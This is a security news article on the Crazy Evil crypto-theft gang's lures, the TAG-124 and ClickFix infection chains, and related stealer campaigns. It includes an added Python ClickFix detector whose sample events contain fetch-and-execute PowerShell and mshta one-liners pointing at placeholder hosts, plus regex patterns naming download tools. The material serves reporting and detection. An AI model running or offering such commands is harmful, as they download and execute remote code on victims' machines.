Over 10 active social media scams that rely on a wide range of targeted lures to mislead victims and trick them into installing malware such as StealC and Atomic macOS Stealer (aka AMOS) have been linked to a Russian-speaking crime gang known as Crazy Evil.
"Specializing in identity fraud, cryptocurrency theft, and information-stealing malware, Crazy Evil employs a well-coordinated network of traffers — social engineering specialists tasked with redirecting legitimate traffic to malicious phishing pages," Recorded Future's Insikt Group said in an analysis.
The cryptoscam group's use of a diverse malware arsenal signals that the threat actor is attempting to target users of both Windows and macOS systems, putting the decentralized finance ecosystem at risk.
Crazy Evil is assessed to have been active since at least 2021, mainly as a traffer group tasked with directing legitimate traffic to malicious landing pages operated by various criminal organizations. Allegedly run by a threat actor known on Telegram as @AbrahamCrazyEvil, it serves over 4,800 subscribers on the messaging platform (@CrazyEvilCorp) as of writing.
In a detailed report about traffer services in August 2022, French cybersecurity company Sekoia stated that they "monetize the traffic to these malware operators, who intend to target users either broadly or specifically, by region or by operating system."
It added: "The traffer's main challenge is to generate high-quality traffic without bots, undetected or unanalyzed by security vendors, and ultimately filtered by traffic type. In other words, the traffers' activity is a form of lead generation."
Unlike other traffer operations that revolve around setting up counterfeit shopping sites to facilitate fraudulent transactions, Crazy Evil focuses on the theft of digital assets involving non-fungible tokens (NFTs), cryptocurrencies, payment cards, and online banking accounts. It is thought to have compromised tens of thousands of devices around the world and generated more than $5 million in illicit revenue.
It has also gained new attention following scams involving two other crime organizations, both of which Sekoia had previously identified as being responsible for a campaign using fake Google Meet pages in October 2024.
According to Recorded Future, "Crazy Evil explicitly victimizes the cryptocurrency space with bespoke spear-phishing lures." It added: "Crazy Evil traffers occasionally take days or weeks of reconnaissance time to scope operations, identify targets, and initiate engagements."
The group's administrators claim to provide training manuals and support for its traffers and for the malicious payloads, and boast of an affiliate-style structure for outsourcing operations. They also claim to orchestrate attack chains that deliver information stealers and wallet drainers.
Like other crime organizations exposed in recent years, Crazy Evil operates in a Telegram-based environment. A threat actor-controlled Telegram bot directs newly recruited affiliates to other private channels:
- Payments, which announces profits for traffers
- Logbar, which provides an audit trail of information stealer logs, details about the stolen data, and whether the targets are repeat victims
- Info, which periodically updates traffers' technical and administrative information
- International Talk, the primary gathering place for discussions ranging from work to memes, which serves as the group's main communication channel
The crime group has been found to comprise six sub-teams, AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND, each of which has been attributed to a particular scam that involves duping victims into installing bogus software from fraudulent websites:
- AVLAND (also known as AVS|RG or AVENGE), which uses job offer and investment scams to spread the StealC and AMOS stealers under the guise of a Web3 communication tool called Voxium ("voxiumcalls[.]com")
- TYPED, which uses a purported artificial intelligence program called TyperDex ("typerdex[.]ai") to propagate the AMOS stealer
- DELAND, which uses a purported community development platform called DeMeet ("demeet[.]app") to propagate the AMOS stealer
- ZOOMLAND, which leverages generic scams impersonating Zoom and WeChat ("app-whechat[.]com") to propagate the AMOS stealer
- DEFI, which spreads the AMOS stealer under the guise of a Selenium Finance digital asset management platform (hosted on a [.]fi domain)
- KEVLAND, which uses Gatherum, a purported AI-enhanced virtual meeting software (hosted on a [.]ca domain), to propagate the AMOS stealer
Other cybercriminal organizations are likely to imitate Crazy Evil's methods, which means security teams must remain vigilant to prevent widespread breaches and the erosion of trust in the cryptocurrency, gaming, and software sectors, according to Recorded Future.
The development comes as the cybersecurity company exposed a traffic distribution system (TDS) dubbed TAG-124, which overlaps with several previously documented activity clusters. Multiple threat groups have been found to use the TDS in their initial infection sequences.
"TAG-124 comprises a network of compromised WordPress sites, actor-controlled payload servers, a central server, a suspected management server, an additional panel, and other components," it said. The compromised WordPress websites display fake Google Chrome update landing pages, which ultimately lead to malware infections if visitors meet certain criteria.
Additionally, Recorded Future noted that shared use of TAG-124 reinforces the link between the groups that rely on it, and that recent TAG-124 campaigns used the ClickFix method, which tricks users into copying a command from the clipboard and running it themselves to launch the malware infection.
Examples of the payloads deployed this way include Remcos RAT and the malware also known as Broomstick or Oyster, both of which have been used to deliver the Rhysida and Interlock ransomware.
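The ClickFix technique described above ends with the victim executing a pasted one-liner, which leaves a distinctive process-creation trail. The following is an added detection example, not code from Recorded Future or from the page: it scores simplified process-creation events (constructed here, loosely modelled on Sysmon Event ID 1 fields) for a script host spawned from the desktop shell with a remote fetch-and-execute command line. It assumes the lure has the user paste into the Windows Run dialog, whose child processes are parented by explorer.exe; the page itself only says the command is copied from the clipboard.

```python
import re
from typing import Iterable

# Interpreters commonly abused to run a pasted one-liner (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# Assumption: the victim pastes into the Run dialog (Win+R), which is owned by
# explorer.exe, so the script host appears as a direct child of the shell.
PASTE_PARENTS = {"explorer.exe"}
# Command-line fragments that fetch remote content and execute it.
REMOTE_EXEC = re.compile(
    r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|invoke-expression|iex|downloadstring)\b"
    r"|\bmshta(\.exe)?\s+https?://"
    r"|\b(curl|certutil|bitsadmin)\b.*https?://"
    r"|\s-(enc|encodedcommand|e)\s",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.IGNORECASE)

# Constructed sample events; none of these paths or hosts are real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://update.invalid/chrome)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://update.invalid/verify.hta"},
    {"parent": r"C:\Program Files\Code\Code.exe",          # developer running a build
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",                   # ordinary user action
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    if basename(ev["image"]) in SCRIPT_HOSTS:
        reasons.append("script host")
    if basename(ev["parent"]) in PASTE_PARENTS:
        reasons.append("spawned directly from the shell (Run dialog)")
    if REMOTE_EXEC.search(ev["cmdline"]):
        reasons.append("remote fetch/execute in command line")
    if HIDDEN_WINDOW.search(ev["cmdline"]):
        reasons.append("hidden window requested")
    return len(reasons), reasons


def detect_clickfix(events: Iterable[dict], threshold: int = 3) -> list[dict]:
    """Return events whose score meets the threshold, with reasons attached.

    A single signal (a script host, or explorer.exe as parent) is normal on
    any workstation; the combination is what makes a pasted lure stand out.
    """
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({**ev, "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(hit["score"], basename(hit["image"]), "|", "; ".join(hit["reasons"]))
```

The threshold of three signals keeps a developer's `powershell -File build.ps1` and a plain `notepad.exe` launch out of the results while flagging both pasted commands; tune the parent list if your environment launches Run-dialog children through a different shell process.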
Separately, more than 10,000 compromised WordPress sites have been discovered serving as a distribution channel for AMOS and SocGholish as part of what has been described as a client-side attack.
"JavaScript loaded in the user's browser generates the fake page in an iframe," c/side researcher Himanshu Anand said. "The attackers abuse outdated WordPress versions and plugins to make detection more difficult for websites without a client-side monitoring tool in place."
Additionally, threat actors have been observed abusing popular platforms like GitHub to host malicious installers that lead to the deployment of Lumma Stealer and other payloads such as SectopRAT, Vidar Stealer, and Cobalt Strike Beacon.
The activity observed by Trend Micro overlaps significantly with the tactics of a threat actor with a track record of using GitHub repositories for payload distribution. The infection chain, however, starts with compromised websites that redirect to malicious GitHub release links.
Security researchers Buddy Tancio, Fe Cureg, and Jovit Samaniego said that the distribution strategy for Lumma Stealer is evolving, with the threat actor now using GitHub repositories to host the malware.
"The malware-as-a-service (MaaS) model provides malicious actors with a cost-effective and accessible means to execute complex cyberattacks and achieve their malicious objectives, easing the distribution of threats such as Lumma Stealer," they added.